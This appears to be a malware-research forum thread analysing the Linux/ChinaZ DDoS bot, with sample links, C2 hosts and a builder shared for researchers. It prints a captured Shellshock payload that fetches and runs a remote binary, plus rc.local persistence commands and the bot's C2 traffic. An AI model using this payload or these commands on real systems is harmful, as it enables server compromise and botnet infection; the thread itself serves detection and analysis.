[unixfreaxjp]

The ELF's VT is: https://www.virustotal.com/en/file/92fd ... /analysis/
Out initial draft report: https://pastebin.com/raw.php?i=gf4xrB9n
This threat was detected just recently, via attacks via shellshock:

Code: Select all

/bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >>
 /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget
 http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" 

The above request was reported to be generated from Windows version of the shellshock scanner binary with the below trace:
VT is: https://www.virustotal.com/en/file/ae67 ... /analysis/ < noted: LOW detection..

Code: Select all

.rdata:0057D808 aBinBashCRmRfTm db '() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget %s -O /tmp/China'
.rdata:0057D808                                         ; DATA XREF: StartAddress+124o
.rdata:0057D808                 db '.Z-%s >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chm'
.rdata:0057D808                 db 'od 777 /tmp/China.Z-%s >> /tmp/Run.sh;echo /tmp/China.Z-%s >> /tm'
.rdata:0057D808                 db 'p/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Ru'
.rdata:0057D808                 db 'n.sh;/tmp/Run.sh"',0

The ELF payload was served in a hacked windows system served this ELF with the HFS server:


The calls, subs & function name is obfuscated, yet some new uniq typical characteristics can be spotted like below for the detection purpose:






registration for the autostart is using /etc/rc.local modification:

Code: Select all

sed -i -e '/exit/d' /etc/rc.local
sed -i -e '2 i//ChinaZ' /etc/rc.local

It hammered SE Linux, using hosts.conf - resolve.conf - and libnss as DNS resolver, and generated the backdoor is as per below, noted: not necessarily using hostname basis.

Code: Select all

SYSCALL5A, send(3, "cM\1\0\0\1\0\0\0\0\0\0\2aa\5gm352\3com\0\0\1\0\1", 30, MSG_NOSIGNAL)
SYSCALL5B, recvfrom(3, "cM\201\200\0\1\0\1\0\5\0\5\2aa\5gm352\3com\0\0\1\0\1\300\f"..., 1024, 0, 
           $PARAMS:{sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("202.238.95.24")}, [16]) 
SYSCALL5C, connect(3, {sa_family=AF_INET, sin_port=htons(9521), sin_addr=inet_addr("121.12.173.173")}, 16)
SYSCALL5D, write(3, "\0\0\0\0Linux2.6.2-4-686-\0\275w\267\0\1\0\0"..., 168) = 168

In this particular sample it calls CNC in aa.gm352.com (121.12.173.173:9521) at ASN 58543 | 121.12.168.0/21 | CHINATELECOM-HUNAN-H

Code: Select all

$ my_lookup aa.gm352.com
aa.gm352.com.           300     IN      A       121.12.173.173
gm352.com.              3600    IN      NS      ns4.he.net.
gm352.com.              3600    IN      NS      ns3.he.net.
gm352.com.              3600    IN      NS      ns2.he.net.
gm352.com.              3600    IN      NS      ns1.he.net.
gm352.com.              3600    IN      NS      ns5.he.net.
 
$ mycnccheck 121.12.173.173:9521
Connection to 121.12.173.173 9521 port [tcp/*] succeeded!
IPv4   TCP MMD.KickUR.ASS:36555->121.12.173.173:9521 (ESTABLISHED)

Due to the unique new infection pair shellshock (scanner-payload), new functions & new signature used, we consider this is a new China DDOSer variant: "ChinaZ"
#MalwareMustDie!
*) Threat found by B of MMD ELF Team

[unixfreaxjp]

New infection on steroids.. Linux/ChinaZ.DDoS.
The shellshock drives the infection into the utmost speed.. ALERT!!

https://www.virustotal.com/en/file/b337 ... 421439503/
CNC: 121.12.173.173:9521
#MalwareMustDie! ELF Team

[unixfreaxjp]

The modular version of the ChinaZ in dynamic ELFs (w/shared libs).
Detection ratio is literally ZERO for these modules:
DDoSClient:
https://www.virustotal.com/en/file/b540 ... /analysis/
https://www.virustotal.com/en/file/a86b ... 421490630/
DDosStarter:
https://www.virustotal.com/en/file/daaa ... 421491358/
https://www.virustotal.com/en/file/daaa ... 421491358/

Analysis is in MMD blog: http://blog.malwaremustdie.org/2015/01/ ... ml#modular
Please credit #malwaremustdie for this findings.

[unixfreaxjp]

I am sorry to write this in the ELF threat, it is so related to the post in http://www.kernelmode.info/forum/viewto ... 682#p24982
Windows version of the ChinaZ client attacker is also spotted in a set of ELF samples.

I wrote the summary of my reversing in VT: https://www.virustotal.com/en/file/714e ... /analysis/
#MalwareMustDie!

[ilaloyka]

I don't get the malware which shared by you. How to get the malware. I'm sorry.
Hi, What does it mean `DDosWorksServerEeCodeKey` in 8048194

[ilaloyka]

New ip address is 137.175.13.210:9521

[unixfreaxjp]

New variant of ELF Linux/ChinaZ




VT (4/57): https://www.virustotal.com/en/file/82d3 ... 434758775/
Analysis: http://blog.malwaremustdie.org/2015/06/ ... oaded.html
ELF samples shared in kernelmode.info only - #malwaremustdie

[unixfreaxjp]

Linux/ChinaZ.DDoS binary builder for x32/x64 (and Win x32) is shared in here for raising the detection ratio of the threat, for research and mitigation purpose.
WARNING! This is not a toy for fun, but a crimeware tool, using this online w/o good handling can create damage on any service will violate the law and can cause your internet service will be blacklisted or worse blocked, so the risk is all yours. Please analyze it in your test environment only.

Please read analysis in MalwareMustDie for the more info and the source of the threat: http://blog.malwaremustdie.org/2015/06/ ... es-on.html
VT=NULL: https://www.virustotal.com/en/file/59e6 ... /analysis/


Snapshot:


Builder Interface:


Binary templates:


Binary ELF templates contains ChinaZ github codes:


We can not share the Win32 template (N/A) & CNC tools (forbidden by law, it'll be beyond research category for openly shared, I can go to jail), please contact in PM with your detail info to record the share. Sorry for the bummer, please bear with the safety procedure. For the snapshot of CNC tool are in MMD post, VT: https://www.virustotal.com/en/file/8b58 ... /analysis/

#MalwareMustDie's work & share to anti malware community.

[unixfreaxjp]

The panel:

CNC is domain basis

Code: Select all

hostname: www.ddos123.xyz
IP: 42.51.156.201
Port: 29135

Sample:
https://www.virustotal.com/en/file/bcaa ... /analysis/
https://www.virustotal.com/en/file/1ce9 ... /analysis/
Analysis: http://blog.malwaremustdie.org/2015/08/ ... 23xyz.html

[unixfreaxjp]

The ChinaZ "Edition 2.0" (they called it)






spotted in infection on going busy panel:


Sample is only detected by 5/five antiviruses
https://www.virustotal.com/en/file/bae6 ... /analysis/